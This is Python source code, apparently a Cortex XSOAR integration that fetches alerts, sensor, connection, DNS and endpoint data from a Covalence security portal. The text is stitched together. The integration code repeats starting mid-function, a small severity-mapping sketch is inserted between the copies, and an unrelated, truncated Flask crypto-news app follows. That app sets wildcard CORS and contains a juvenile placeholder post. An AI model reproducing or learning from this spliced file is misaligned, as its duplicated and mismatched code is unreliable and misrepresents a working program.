import os import requests import json import traceback import dateparser from datetime import datetime, timedelta from bs4 import BeautifulSoup from CommonServerPython import * from typing import List import demistomock as demisto DATE_FORMAT = '%Y-%m-%dT%H:%M:%S' HOST = demisto.params().get('host') BROKER = argToBoolean(demisto.params().get('broker', False)) USERNAME = demisto.params().get('credentials')['identifier'] PASSWORD = demisto.params().get('credentials')['password'] VERIFY_SSL = demisto.params().get('verify_ssl') TIMEOUT = int(demisto.params().get('timeout')) FIRST_RUN_TIME_RANGE = int(demisto.params().get('first_run_time_range').strip()) FETCH_LIMIT = int(demisto.params().get('fetch_limit')) PROXY = demisto.params().get('proxy') if not demisto.params().get('proxy', False): del os.environ['HTTP_PROXY'] del os.environ['HTTPS_PROXY'] del os.environ['http_proxy'] del os.environ['https_proxy'] def find_covs(client_name): url = f'https://{HOST}/index' r = requests.get(url, verify=VERIFY_SSL) covs = [] soup = BeautifulSoup(r.text, 'html.parser') for link in soup.find_all('a'): if client_name == link.contents[0]: href = link.get('href', '') if href: covs.append(href.split('/index/', 1)[-1]) return covs def build_host(host): host = host.rstrip('/') if not host.startswith('https:') and not host.startswith('http:'): host = 'https://' + host if host.startswith('https:') and not host.endswith('/CovalenceWebUI/services'): host += '/CovalenceWebUI/services' elif not host.endswith('/services'): host += '/services' return host def login(host=HOST, cov_id=None, username=USERNAME, password=PASSWORD, verify_ssl=VERIFY_SSL): if not username: raise Exception('Username must be supplied') if not password: raise Exception('Password must be supplied') if not host: raise Exception('Host must be supplied') host = build_host(host) if not verify_ssl: # Disable the warnings if we're not verifying ssl import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) s = requests.Session() if BROKER and cov_id: url = f'https://{HOST}/index/{cov_id}' s.get(url, verify=verify_ssl) p = {'username': username, 'password': password} r = s.post(host + '/rest/login', data=p, verify=verify_ssl) if 200 != r.status_code: raise Exception("Failed to login to %s - %d" % (host, r.status_code)) if not s.cookies: raise Exception("Failed to retrieve cookie") return s def send_request(method, api_endpoint, target_org=None, host=HOST, headers=None, params=None, data=None, json=None): cov_ids = [] BROKER = argToBoolean(demisto.params().get('broker', False)) if BROKER: if target_org: cov_ids = find_covs(target_org) if not cov_ids: raise ValueError(f'Unknown organization {target_org}') else: raise ValueError('Target organization is required in broker mode') else: cov_ids.append(None) result = [] for cov_id in cov_ids: s = login(cov_id=cov_id) host = build_host(host) url = f'{host}{api_endpoint}' req = requests.Request(method, url, headers=headers, params=params, data=data, json=json) prepped = s.prepare_request(req) try: resp = s.send(prepped, stream=None, verify=VERIFY_SSL, proxies=PROXY, cert=None, timeout=TIMEOUT ) resp.raise_for_status() except Exception: return_error('Error in API call [%d] - %s' % (resp.status_code, resp.reason)) else: # when having several covs # merging each response from each covs into one if isinstance(resp.json(), dict): result.append(resp.json()) elif isinstance(resp.json(), list): result = result + resp.json() else: result.append(resp.json()) return result def fetch_incidents(last_run, 
first_run_time_range): target_orgs = [] if BROKER: orgs = list_org() for org in orgs: target_orgs.append(org['org_name']) else: target_orgs.append(None) next_run = {} incidents = [] for target_org in target_orgs: if target_org: last_fetch = last_run.get(f'{target_org}_last_fetch', None) last_alert_id = last_run.get(f'{target_org}_last_alert_id', None) else: last_fetch = last_run.get('last_fetch', None) last_alert_id = last_run.get('last_alert_id', None) alert_time_max = datetime.utcnow() if last_fetch is None: alert_time_min = alert_time_max - timedelta(days=first_run_time_range) else: alert_time_min = dateparser.parse(last_fetch) # type: ignore assert alert_time_min is not None cov_alerts = list_alerts(target_org=target_org, max_count=FETCH_LIMIT, alert_time_min=alert_time_min.strftime(DATE_FORMAT), alert_time_max=alert_time_max.strftime(DATE_FORMAT), details='true') latest_created_time = alert_time_min for a in cov_alerts: if a['id'] != last_alert_id: created_time = datetime.utcfromtimestamp(a.get('createdTime', 0)) created_time_str = created_time.strftime(DATE_FORMAT) if BROKER: incident_name = f'''[{target_org}] [{a.get('type', 'No alert type')}] {a.get('analystTitle', 'No title')}''' else: incident_name = f'''[{a.get('type', 'No alert type')}] {a.get('analystTitle', 'No title')}''' incident: Dict[str, Any] = { 'name': incident_name, 'occured': created_time_str, 'rawJSON': json.dumps(a) } if a.get('severity', None): # XSOAR mapping # Unknown: 0 # Informational: 0.5 # Low: 1 # Medium: 2 # High: 3 # Critical: 4 severity_from_portal = a['severity'] if severity_from_portal == 'Informational': incident['severity'] = 0.5 elif severity_from_portal == 'Warning': incident['severity'] = 1 elif severity_from_portal == 'Low': incident['severity'] = 1 elif severity_from_portal == 'Medium': incident['severity'] = 2 elif severity_from_portal == 'High': incident['severity'] = 3 elif severity_from_portal == 'Critical': incident['severity'] = 4 else: incident['severity'] = 0 if a.get('analystDescription', None): incident['details'] = a['analystDescription'] incidents.append(incident) if created_time > latest_created_time: latest_created_time = created_time last_alert_id = a['id'] if BROKER: next_run[f'{target_org}_last_fetch'] = latest_created_time.strftime(DATE_FORMAT) next_run[f'{target_org}_last_alert_id'] = last_alert_id else: next_run['last_fetch'] = latest_created_time.strftime(DATE_FORMAT) next_run['last_alert_id'] = last_alert_id return next_run, incidents def list_alerts(target_org=None, max_count=None, initial_index=None, alert_type=None, alert_time_min=None, alert_time_max=None, advanced_filter=None, details=None): if target_org is None: target_org = demisto.args().get('target_org', None) if max_count is None: max_count = demisto.args().get('max_count', 1000) if initial_index is None: initial_index = demisto.args().get('initial_index', None) if alert_type is None: alert_type = demisto.args().get('alert_type', None) if alert_time_min is None: alert_time_min = demisto.args().get('alert_time_min', None) if alert_time_max is None: alert_time_max = demisto.args().get('alert_time_max', None) if advanced_filter is None: advanced_filter = demisto.args().get('advanced_filter', None) params = {} if max_count: params['maxCount'] = max_count if initial_index: params['initialIndex'] = initial_index if alert_type: params['alertType'] = alert_type if alert_time_min: params['alertTimeMin'] = alert_time_min if alert_time_max: params['alertTimeMax'] = alert_time_max if advanced_filter: params['advancedFilter'] 
= advanced_filter r = send_request('GET', '/rest/v1/alerts', target_org=target_org, params=params) if details is None: details = argToBoolean(demisto.args().get('details', 'false')) keys = ['acknowledgedStatus', 'analystDescription', 'analystTitle', 'destIp', 'sourceIp', 'subType', 'title', 'type'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: return r def get_health(): if BROKER: # must do health check on all cov health_check_resp = [] orgs = list_org() for org in orgs: health_check_resp.append( send_request('GET', '/rest/v1/health', target_org=org['org_name']) ) # "logical and" accross all health checks return all(health_check_resp) else: return send_request('GET', '/rest/v1/health') def list_sensors(): target_org = demisto.args().get('target_org', None) r = send_request('GET', '/rest/v1/sensors', target_org=target_org) details = argToBoolean(demisto.args().get('details', 'false')) keys = ['isAuthorized', 'isNetflowGenerator', 'name'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: for s in r: del s['lastActive'] return r def get_sensor(): target_org = demisto.args().get('target_org', None) sensor_id = demisto.args().get('sensor_id') r = send_request('GET', f'/rest/v1/sensors/{sensor_id}', target_org=target_org) for sensor in r: del sensor['lastActive'] return r def connections_summary_by_ip(): target_org = demisto.args().get('target_org', None) max_count = demisto.args().get('max_count', 100) initial_index = demisto.args().get('initial_index', None) source_ip = demisto.args().get('source_ip', None) start_time = demisto.args().get('start_time', None) end_time = demisto.args().get('end_time', None) clients_only = bool(demisto.args().get('clients_only', False)) internal_only = bool(demisto.args().get('internal_only', False)) advanced_filter = demisto.args().get('advanced_filter', None) params = {} if max_count: params['maxCount'] = max_count if initial_index: params['initialIndex'] = initial_index if source_ip: params['sourceIp'] = source_ip if start_time: params['startTime'] = start_time if end_time: params['endTime'] = end_time if clients_only: params['clientsOnly'] = clients_only if internal_only: params['internalOnly'] = internal_only if advanced_filter: params['advancedFilter'] = advanced_filter r = send_request('GET', '/rest/v1/connections/ipsummary', target_org=target_org, params=params) details = argToBoolean(demisto.args().get('details', 'false')) keys = ['averageDuration', 'bytesIn', 'bytesOut', 'clientServerRelationship', 'destinationIpAddress', 'dstDomainName', 'serverPorts', 'sourceDomainName', 'sourceIpAddress'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: return r def connections_summary_by_port(): target_org = demisto.args().get('target_org', None) max_count = demisto.args().get('max_count', 100) initial_index = demisto.args().get('initial_index', None) source_ip = demisto.args().get('source_ip', None) start_time = demisto.args().get('start_time', None) end_time = demisto.args().get('end_time', None) clients_only = bool(demisto.args().get('clients_only', False)) internal_only = bool(demisto.args().get('internal_only', False)) advanced_filter = demisto.args().get('advanced_filter', None) params = {} if max_count: params['maxCount'] = max_count if initial_index: 
params['initialIndex'] = initial_index if source_ip: params['sourceIp'] = source_ip if start_time: params['startTime'] = start_time if end_time: params['endTime'] = end_time if clients_only: params['clientsOnly'] = clients_only if internal_only: params['internalOnly'] = internal_only if advanced_filter: params['advancedFilter'] = advanced_filter r = send_request('GET', '/rest/v1/connections/portsummary', target_org=target_org, params=params) details = argToBoolean(demisto.args().get('details', 'false')) keys = ['averageDuration', 'bytesIn', 'bytesOut', 'destinationIpAddress', 'dstDomainName', 'serverPort', 'sourceDomainName', 'sourceIpAddress'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: return r def list_dns_resolutions(): target_org = demisto.args().get('target_org', None) max_count = demisto.args().get('max_count', 100) initial_index = demisto.args().get('initial_index', None) request_time_after = demisto.args().get('request_time_after', None) request_time_before = demisto.args().get('request_time_before', None) domain_name = demisto.args().get('domain_name', None) resolved_ip = demisto.args().get('resolved_ip', None) request_origin_ip = demisto.args().get('request_origin_ip', None) nameserver_ip = demisto.args().get('nameserver_ip', None) advanced_filter = demisto.args().get('advanced_filter', None) params = {} if max_count: params['maxCount'] = max_count if initial_index: params['initialIndex'] = initial_index if request_time_after: params['requestTimeAfter'] = request_time_after if request_time_before: params['requestTimeBefore'] = request_time_before if domain_name: params['domainName'] = domain_name if resolved_ip: params['resolvedIp'] = resolved_ip if request_origin_ip: params['requestOriginIp'] = request_origin_ip if nameserver_ip: params['nameserverIp'] = nameserver_ip if advanced_filter: params['advancedFilter'] = advanced_filter r = send_request('GET', '/rest/v1/dns/resolutions', target_org=target_org, params=params) details = argToBoolean(demisto.args().get('details', 'false')) keys = ['domainName', 'requestOriginIp', 'requestTime', 'resolvedIp'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: return r def list_internal_networks(): target_org = demisto.args().get('target_org', None) return send_request('GET', '/rest/v1/internal_networks', target_org=target_org) def set_internal_networks(): if BROKER: ValueError(f'{demisto.command()} is not available in broker mode') target_org = demisto.args().get('target_org', None) cidr = demisto.args().get('cidr', None) notes = demisto.args().get('notes', None) networks = [] networks.append( { 'cidr': cidr, 'notes': notes } ) send_request('PUT', '/rest/v1/internal_networks', target_org=target_org, json=networks) return cidr, notes def list_endpoint_agents(): target_org = demisto.args().get('target_org', None) advanced_filter = demisto.args().get('advanced_filter', None) params = {} if advanced_filter: params['advancedFilter'] = advanced_filter r = send_request('GET', '/rest/v2/endpoint/agent/agents', target_org=target_org, params=params) details = argToBoolean(demisto.args().get('details', 'false')) keys = ['hardwareVendor', 'hostName', 'ipAddress', 'isConnected', 'lastSessionUser', 'operatingSystem', 'serialNumber'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} 
filtered_r.append(s) return filtered_r else: return r def find_endpoint_by_user(): target_org = demisto.args().get('target_org', None) user = demisto.args().get('user', None) params = {} params['advancedFilter'] = f'lastSessionUser={user}' return send_request('GET', '/rest/v2/endpoint/agent/agents', target_org=target_org, params=params) def find_endpoint_by_uuid(): target_org = demisto.args().get('target_org', None) uuid = demisto.args().get('uuid', None) params = {} params['advancedFilter'] = f'agentUuid={uuid}' return send_request('GET', '/rest/v2/endpoint/agent/agents', target_org=target_org, params=params) def search_endpoint_process(): target_org = demisto.args().get('target_org', None) name = demisto.args().get('name', None) advanced_filter = demisto.args().get('advanced_filter', None) params = {} if name: params['name'] = name if advanced_filter: params['advancedFilter'] = advanced_filter r = send_request('GET', '/rest/v2/endpoint/process/search', target_org=target_org, params=params) details = argToBoolean(demisto.args().get('details', 'false')) keys = ['commandLine', 'firstSeenTime', 'lastSeenTime', 'processPath', 'username'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: return r def search_endpoint_installed_software(): target_org = demisto.args().get('target_org', None) name = demisto.args().get('name', None) version = demisto.args().get('version', None) advanced_filter = demisto.args().get('advanced_filter', None) params = {} if name: params['name'] = name if version: params['version'] = version if advanced_filter: params['advancedFilter'] = advanced_filter r = send_request('GET', '/rest/v2/endpoint/software/search', target_org=target_org, params=params) details = argToBoolean(demisto.args().get('details', 'false')) keys = ['installTimestamp', 'name', 'uninstallTimestamp', 'vendor', 'version'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: return r def list_org(): if not BROKER: ValueError(f'{demisto.command()} is only available in broker mode') url = f'https://{HOST}/index' r = requests.get(url, verify=VERIFY_SSL) org_names: List[dict] = [] soup = BeautifulSoup(r.text, 'html.parser') for link in soup.find_all('a'): org_name = link.contents[0] if org_name: if org_name not in [i['org_name'] for i in org_names]: org_names.append({'org_name': org_name}) return org_names def main(): demisto.info(f'{demisto.command()} is called') try: if demisto.command() == 'test-module': if get_health(): return_results('ok') else: return_results('nok') elif demisto.command() == 'fetch-incidents': next_run, incidents = fetch_incidents( last_run=demisto.getLastRun(), first_run_time_range=FIRST_RUN_TIME_RANGE) demisto.setLastRun(next_run) demisto.incidents(incidents) elif demisto.command() == 'cov-secpr-list-alerts': r = list_alerts() if r: readable_output = tableToMarkdown('Alerts', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No alerts found' results = CommandResults( outputs_prefix='Covalence.Alert', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-list-sensors': r = list_sensors() if r: readable_output = tableToMarkdown('Sensors', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No sensors found' results = CommandResults( 
outputs_prefix='Covalence.Sensors', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-get-sensor': r = get_sensor() if r: readable_output = tableToMarkdown('Sensor', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'None sensor found' results = CommandResults( outputs_prefix='Covalence.Sensor', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-connections-summary-ip': r = connections_summary_by_ip() if r: readable_output = tableToMarkdown('Connections', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No connections found' results = CommandResults( outputs_prefix='Covalence.Connections', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-connections-summary-port': r = connections_summary_by_port() if r: readable_output = tableToMarkdown('Connections', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No connections found' results = CommandResults( outputs_prefix='Covalence.Connections', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-list-dns-resolutions': r = list_dns_resolutions() if r: readable_output = tableToMarkdown('DNS Resolutions', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No DNS resolutions found' results = CommandResults( outputs_prefix='Covalence.DNSResolutions', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-list-internal-networks': r = list_internal_networks() if r: readable_output = tableToMarkdown('Internal Networks', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No internal networks found' results = CommandResults( outputs_prefix='Covalence.InternalNetworks', outputs_key_field='cidr', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-set-internal-networks': r = set_internal_networks() cidr = r[0] notes = r[1] readable_output = f'Internal network set as {cidr} with notes "{notes}"' results = CommandResults( outputs_prefix='Covalence.InternalNetworks', outputs_key_field='cidr', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-list-endpoint-agents': r = list_endpoint_agents() if r: readable_output = tableToMarkdown('Endpoint Agents', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No endpoint agents found' results = CommandResults( outputs_prefix='Covalence.EndpointAgents', outputs_key_field='agentUuid', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-find-endpoint-agents-by-user': r = find_endpoint_by_user() if r: readable_output = tableToMarkdown('Endpoint Agents', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No endpoint agents found' results = CommandResults( outputs_prefix='Covalence.EndpointAgents', outputs_key_field='agentUuid', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-find-endpoint-agents-by-uuid': r = find_endpoint_by_uuid() if r: readable_output = tableToMarkdown('Endpoint 
Agents', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No endpoint agents found' results = CommandResults( outputs_prefix='Covalence.EndpointAgents', outputs_key_field='agentUuid', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-search-endpoint-process': r = search_endpoint_process() if r: readable_output = tableToMarkdown('Endpoint Process', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No endpoint process found' results = CommandResults( outputs_prefix='Covalence.EndpointProcess', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-search-endpoint-installed-software': r = search_endpoint_installed_software() if r: readable_output = tableToMarkdown('Endpoint Software', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No endpoint software found' results = CommandResults( outputs_prefix='Covalence.EndpointSoftware', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-list-organizations': r = list_org() if r: readable_output = tableToMarkdown('Organizations', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No organizations found' results = CommandResults( outputs_prefix='Covalence.EndpointSoftware', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) else: msg = f'Unknown command {demisto.command()}' demisto.error(msg) except Exception as e: demisto.error(traceback.format_exc()) return_error(f'Failed to execute {demisto.command()} command. Error: {str(e)}\n{traceback.format_exc()}') if __name__ in ('__main__', '__builtin__', 'builtins'): main()
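# An equivalent sketch of the portal-to-XSOAR severity mapping used in fetch_incidents
# above, written as a dict lookup; the values mirror the elif chain, and any unrecognised
# label falls back to 0 (Unknown) like the final else branch.
SEVERITY_MAP = {
    'Informational': 0.5,
    'Warning': 1,
    'Low': 1,
    'Medium': 2,
    'High': 3,
    'Critical': 4,
}

def map_severity(portal_severity):
    return SEVERITY_MAP.get(portal_severity, 0)

if __name__ == '__main__':
    for label in ('High', 'Warning', 'Something else'):
        print(label, '->', map_severity(label))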
filtered_r.append(s) return filtered_r else: return r def find_endpoint_by_user(): target_org = demisto.args().get('target_org', None) user = demisto.args().get('user', None) params = {} params['advancedFilter'] = f'lastSessionUser={user}' return send_request('GET', '/rest/v2/endpoint/agent/agents', target_org=target_org, params=params) def find_endpoint_by_uuid(): target_org = demisto.args().get('target_org', None) uuid = demisto.args().get('uuid', None) params = {} params['advancedFilter'] = f'agentUuid={uuid}' return send_request('GET', '/rest/v2/endpoint/agent/agents', target_org=target_org, params=params) def search_endpoint_process(): target_org = demisto.args().get('target_org', None) name = demisto.args().get('name', None) advanced_filter = demisto.args().get('advanced_filter', None) params = {} if name: params['name'] = name if advanced_filter: params['advancedFilter'] = advanced_filter r = send_request('GET', '/rest/v2/endpoint/process/search', target_org=target_org, params=params) details = argToBoolean(demisto.args().get('details', 'false')) keys = ['commandLine', 'firstSeenTime', 'lastSeenTime', 'processPath', 'username'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: return r def search_endpoint_installed_software(): target_org = demisto.args().get('target_org', None) name = demisto.args().get('name', None) version = demisto.args().get('version', None) advanced_filter = demisto.args().get('advanced_filter', None) params = {} if name: params['name'] = name if version: params['version'] = version if advanced_filter: params['advancedFilter'] = advanced_filter r = send_request('GET', '/rest/v2/endpoint/software/search', target_org=target_org, params=params) details = argToBoolean(demisto.args().get('details', 'false')) keys = ['installTimestamp', 'name', 'uninstallTimestamp', 'vendor', 'version'] if not details: filtered_r = [] # returning only data in keys for doc in r: s = {k: doc[k] for k in keys} filtered_r.append(s) return filtered_r else: return r def list_org(): if not BROKER: ValueError(f'{demisto.command()} is only available in broker mode') url = f'https://{HOST}/index' r = requests.get(url, verify=VERIFY_SSL) org_names: List[dict] = [] soup = BeautifulSoup(r.text, 'html.parser') for link in soup.find_all('a'): org_name = link.contents[0] if org_name: if org_name not in [i['org_name'] for i in org_names]: org_names.append({'org_name': org_name}) return org_names def main(): demisto.info(f'{demisto.command()} is called') try: if demisto.command() == 'test-module': if get_health(): return_results('ok') else: return_results('nok') elif demisto.command() == 'fetch-incidents': next_run, incidents = fetch_incidents( last_run=demisto.getLastRun(), first_run_time_range=FIRST_RUN_TIME_RANGE) demisto.setLastRun(next_run) demisto.incidents(incidents) elif demisto.command() == 'cov-secpr-list-alerts': r = list_alerts() if r: readable_output = tableToMarkdown('Alerts', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No alerts found' results = CommandResults( outputs_prefix='Covalence.Alert', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-list-sensors': r = list_sensors() if r: readable_output = tableToMarkdown('Sensors', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No sensors found' results = CommandResults( 
outputs_prefix='Covalence.Sensors', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-get-sensor': r = get_sensor() if r: readable_output = tableToMarkdown('Sensor', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'None sensor found' results = CommandResults( outputs_prefix='Covalence.Sensor', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-connections-summary-ip': r = connections_summary_by_ip() if r: readable_output = tableToMarkdown('Connections', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No connections found' results = CommandResults( outputs_prefix='Covalence.Connections', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-connections-summary-port': r = connections_summary_by_port() if r: readable_output = tableToMarkdown('Connections', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No connections found' results = CommandResults( outputs_prefix='Covalence.Connections', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-list-dns-resolutions': r = list_dns_resolutions() if r: readable_output = tableToMarkdown('DNS Resolutions', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No DNS resolutions found' results = CommandResults( outputs_prefix='Covalence.DNSResolutions', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-list-internal-networks': r = list_internal_networks() if r: readable_output = tableToMarkdown('Internal Networks', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No internal networks found' results = CommandResults( outputs_prefix='Covalence.InternalNetworks', outputs_key_field='cidr', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-set-internal-networks': r = set_internal_networks() cidr = r[0] notes = r[1] readable_output = f'Internal network set as {cidr} with notes "{notes}"' results = CommandResults( outputs_prefix='Covalence.InternalNetworks', outputs_key_field='cidr', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-list-endpoint-agents': r = list_endpoint_agents() if r: readable_output = tableToMarkdown('Endpoint Agents', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No endpoint agents found' results = CommandResults( outputs_prefix='Covalence.EndpointAgents', outputs_key_field='agentUuid', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-find-endpoint-agents-by-user': r = find_endpoint_by_user() if r: readable_output = tableToMarkdown('Endpoint Agents', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No endpoint agents found' results = CommandResults( outputs_prefix='Covalence.EndpointAgents', outputs_key_field='agentUuid', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-find-endpoint-agents-by-uuid': r = find_endpoint_by_uuid() if r: readable_output = tableToMarkdown('Endpoint 
Agents', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No endpoint agents found' results = CommandResults( outputs_prefix='Covalence.EndpointAgents', outputs_key_field='agentUuid', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-search-endpoint-process': r = search_endpoint_process() if r: readable_output = tableToMarkdown('Endpoint Process', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No endpoint process found' results = CommandResults( outputs_prefix='Covalence.EndpointProcess', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-search-endpoint-installed-software': r = search_endpoint_installed_software() if r: readable_output = tableToMarkdown('Endpoint Software', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No endpoint software found' results = CommandResults( outputs_prefix='Covalence.EndpointSoftware', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) elif demisto.command() == 'cov-secpr-list-organizations': r = list_org() if r: readable_output = tableToMarkdown('Organizations', r, removeNull=True, headerTransform=string_to_table_header) else: readable_output = 'No organizations found' results = CommandResults( outputs_prefix='Covalence.EndpointSoftware', outputs_key_field='id', outputs=r, readable_output=readable_output ) return_results(results) else: msg = f'Unknown command {demisto.command()}' demisto.error(msg) except Exception as e: demisto.error(traceback.format_exc()) return_error(f'Failed to execute {demisto.command()} command. Error: {str(e)}\n{traceback.format_exc()}') if __name__ in ('__main__', '__builtin__', 'builtins'): main()
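# --- Illustrative sketch (not part of the integration above) --------------------------
# fetch_incidents() maps the Covalence portal severity strings onto XSOAR's numeric
# levels with an if/elif chain (Unknown 0, Informational 0.5, Warning/Low 1, Medium 2,
# High 3, Critical 4). A minimal table-driven equivalent of that same mapping could look
# like this; SEVERITY_MAP and map_severity are hypothetical names, not part of the
# integration itself.
SEVERITY_MAP = {
    'Informational': 0.5,
    'Warning': 1,
    'Low': 1,
    'Medium': 2,
    'High': 3,
    'Critical': 4,
}


def map_severity(portal_severity):
    """Return the XSOAR numeric severity for a Covalence portal severity string."""
    return SEVERITY_MAP.get(portal_severity, 0)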
from flask import Flask, redirect, url_for, render_template, send_from_directory from pycoingecko import CoinGeckoAPI from modules import news, email from flask_cors import CORS from flask import request import datetime import requests import random import string import redis import json import os # video: json_file = open('config.json') config = json.load(json_file) cg = CoinGeckoAPI() ds = config['ds'] app = Flask(__name__, template_folder=config['template_folder']) app.secret_key = config['APP_SECRET_KEY'] CORS(app, resources={r"/*": {"origins": "*"}}) PORT = int(os.environ.get('PORT', 5000)) r = redis.from_url(config['redis-URI']) sender_mail = config['corporative-email'] password = config['corporative-email-password'] # Settings @app.route('/', methods=['GET']) def zero(): return redirect(url_for('home'), code=302) @app.route('/home', methods=['GET']) def home(): return render_template('index.html') @app.route('/about', methods=['GET']) def about(): return render_template('about.html') @app.route('/api', methods=['GET']) def api(): return render_template('api.html') @app.route('/static/<path:path>', methods=['GET']) def static_files(path): return send_from_directory('static', path) # APIs @app.route('/arsen_posts', methods=['GET']) def arsen_posts(): # r.set('news', str(news.get_crypto_news(config['cryptonews_api'], False))) # print(r.get('news').decode("utf-8")) # print(len(json.loads(r.get('news').decode("utf-8")))) dick = [ { 'title': 'I Am Gay', 'image_url': 'https://i.ibb.co/1TFXjB5/photo-2022-03-17-12-03-58.jpg', 'description': 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer facilisis nunc et felis rutrum feugiat. Phasellus lorem ex, tincidunt sit amet diam quis, laoreet rhoncus nulla. Vestibulum tristique id est sed pulvinar. Nam elementum eget tellus eget malesuada. Fusce consectetur, felis et euismod faucibus, turpis lacus imperdiet metus, ac ultricies diam urna id nisi. Proin pharetra viverra cursus. Proin ornare ex erat, a luctus orci consequat eu. Interdum et malesuada fames ac ante ipsum primis in faucibus. Etiam luctus aliquam lacus, sit amet aliquam neque mollis vel. Quisque eleifend pellentesque pulvinar. Nulla facilisi. Quisque ac lorem nec nisi ornare pulvinar in quis nulla. 
